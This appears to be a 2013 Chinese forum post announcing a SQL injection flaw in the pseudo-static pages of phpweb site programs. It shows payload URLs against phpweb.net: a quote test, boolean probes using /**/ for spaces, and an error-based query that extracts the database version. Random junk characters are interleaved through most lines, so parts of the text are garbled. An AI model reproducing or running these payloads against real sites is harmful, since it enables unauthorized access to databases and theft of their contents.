phpweb所有的整站程序伪静态页面都存在sql注入 p! Y8 O% y! Q6 r6 g& p
0 T4 h! R! R+ P( K( L" B3 K主站:http://phpweb.net/: F3 E% ^: p& I. s4 I& N: n4 J
加’检测:
/ f9 I# J; ?! p7 x0 W( ^ ; f A9 ?) g M2 `
http://www.phpweb.net/down/html/?772′.html
1 [2 v" Q. l& }4 } . q) H0 o6 ?0 q( J9 z3 x
出错
, P+ m9 K# a U. t) I存在注入。
8 h* b' ~* T% J! v [不能用空格,只能用/*罗6 G4 x, X7 g* c
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常, _* A+ J' d7 K$ ^/ [; ]- n
/ ?5 ]" t+ y P7 V M
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
. ?) ]0 g l2 p S4 z' T爆数据库版本:% V/ u% X) a0 L9 Q/ j/ _$ [
5 M2 V( m: T. B4 P( P# k2 q?
- n' k2 D+ l8 v9 v& i6 v' x" e1& o8 V6 w) A8 j7 ]/ B# D, t" G
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html! L/ {' k8 y' h' [
更新日期: 2013-01-03 13:39:50
8 r1 N Q3 ^( _# D2 h2 Z$ U% l |
发表于 2013-1-4 19:46:42
收藏
支持
反对